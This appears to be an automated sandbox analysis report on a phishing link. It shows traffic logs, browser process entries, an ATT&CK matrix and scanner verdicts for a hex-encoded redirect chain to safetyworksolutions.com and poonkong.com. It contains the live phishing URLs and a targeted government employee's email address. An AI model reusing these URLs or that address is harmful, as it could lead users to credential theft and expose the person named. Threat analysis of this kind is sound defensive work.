Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55275 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55146
Source: unknownNetwork traffic detected: HTTP traffic on port 55153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55267
Source: unknownNetwork traffic detected: HTTP traffic on port 55285 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55147
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55148
Source: unknownNetwork traffic detected: HTTP traffic on port 55262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55150
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55271
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55151
Source: unknownNetwork traffic detected: HTTP traffic on port 55201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55273
Source: unknownNetwork traffic detected: HTTP traffic on port 55213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55291 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55158
Source: unknownNetwork traffic detected: HTTP traffic on port 55267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55279
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55159
Source: unknownNetwork traffic detected: HTTP traffic on port 55280 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55165
Source: unknownNetwork traffic detected: HTTP traffic on port 55185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55286
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55167
Source: unknownNetwork traffic detected: HTTP traffic on port 55164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55281
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55161
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55282
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55283
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55284
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55280
Source: unknownNetwork traffic detected: HTTP traffic on port 55273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55168
Source: unknownNetwork traffic detected: HTTP traffic on port 55229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55175
Source: unknownNetwork traffic detected: HTTP traffic on port 55245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55178
Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55293
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55174
Source: unknownNetwork traffic detected: HTTP traffic on port 55251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55290
Source: unknownNetwork traffic detected: HTTP traffic on port 55180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55291
Source: unknownNetwork traffic detected: HTTP traffic on port 55146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 55169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55179
Source: unknownNetwork traffic detected: HTTP traffic on port 55152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55187
Source: unknownNetwork traffic detected: HTTP traffic on port 55268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55189
Source: unknownNetwork traffic detected: HTTP traffic on port 55223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55183
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55181
Source: unknownNetwork traffic detected: HTTP traffic on port 55141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 55208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55227
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55228
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55229
Source: unknownNetwork traffic detected: HTTP traffic on port 55289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55223
Source: unknownNetwork traffic detected: HTTP traffic on port 55266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55224
Source: unknownNetwork traffic detected: HTTP traffic on port 55243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55225
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55226
Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55230
Source: unknownNetwork traffic detected: HTTP traffic on port 55220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55232
Source: unknownNetwork traffic detected: HTTP traffic on port 55163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55233
Source: unknownNetwork traffic detected: HTTP traffic on port 55140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55238
Source: unknownNetwork traffic detected: HTTP traffic on port 55192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55239
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55235
Source: unknownNetwork traffic detected: HTTP traffic on port 55284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55236
Source: unknownNetwork traffic detected: HTTP traffic on port 55249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55243
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55240
Source: unknownNetwork traffic detected: HTTP traffic on port 55168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55249
Source: unknownNetwork traffic detected: HTTP traffic on port 55193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55245
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55248
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55252
Source: unknownNetwork traffic detected: HTTP traffic on port 55219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55254
Source: unknownNetwork traffic detected: HTTP traffic on port 55139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55251
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55139
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55256
Source: unknownNetwork traffic detected: HTTP traffic on port 55261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55142
Source: unknownNetwork traffic detected: HTTP traffic on port 55162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55143
Source: unknownNetwork traffic detected: HTTP traffic on port 55244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55260
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55140
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55141
Source: unknownNetwork traffic detected: HTTP traffic on port 55187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55262
Source: unknownNetwork traffic detected: HTTP traffic on port 55145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55200
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55207
Source: unknownNetwork traffic detected: HTTP traffic on port 55155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55208
Source: unknownNetwork traffic detected: HTTP traffic on port 55287 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55201
Source: unknownNetwork traffic detected: HTTP traffic on port 55248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55202
Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55204
Source: unknownNetwork traffic detected: HTTP traffic on port 55161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55211
Source: unknownNetwork traffic detected: HTTP traffic on port 55188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55217
Source: unknownNetwork traffic detected: HTTP traffic on port 55226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55214
Source: unknownNetwork traffic detected: HTTP traffic on port 55265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55215
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55220
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55221
Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55222
Source: unknownNetwork traffic detected: HTTP traffic on port 55183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55271 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:55138 version: TLS 1.2
Source: classification engineClassification label: mal56.win@18/11@10/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1972,i,7630027438406518576,1411224697696924047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1972,i,7630027438406518576,1411224697696924047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ2920%Avira URL Cloudsafe
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://safetyworksolutions.com/favicon.ico0%Avira URL Cloudsafe
https://poonkong.com/o/jsdrive.js0%Avira URL Cloudsafe
https://poonkong.com/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    poonkong.com
    162.144.0.229
    truetrue
      unknown
      d2vgu95hoyrpkh.cloudfront.net
      13.226.184.88
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          www.google.com
          142.250.184.196
          truefalse
            high
            fp2e7a.wpc.phicdn.net
            192.229.221.95
            truefalse
              high
              safetyworksolutions.com
              162.241.87.113
              truefalse
                unknown
                cdn.socket.io
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292false
                    unknown
                    https://www.google.com/amp/s/safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292false
                      high
                      https://safetyworksolutions.com/favicon.icofalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                        high
                        https://poonkong.com/favicon.icotrue
                        • Avira URL Cloud: safe
                        unknown
                        https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.govfalse
                          unknown
                          https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292false
                            high
                            https://poonkong.com/o/jsdrive.jstrue
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            162.241.87.113
                            safetyworksolutions.comUnited States
                            46606UNIFIEDLAYER-AS-1USfalse
                            162.144.0.229
                            poonkong.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            142.250.184.196
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            13.35.58.12
                            unknownUnited States
                            16509AMAZON-02USfalse
                            239.255.255.250
                            unknownReserved
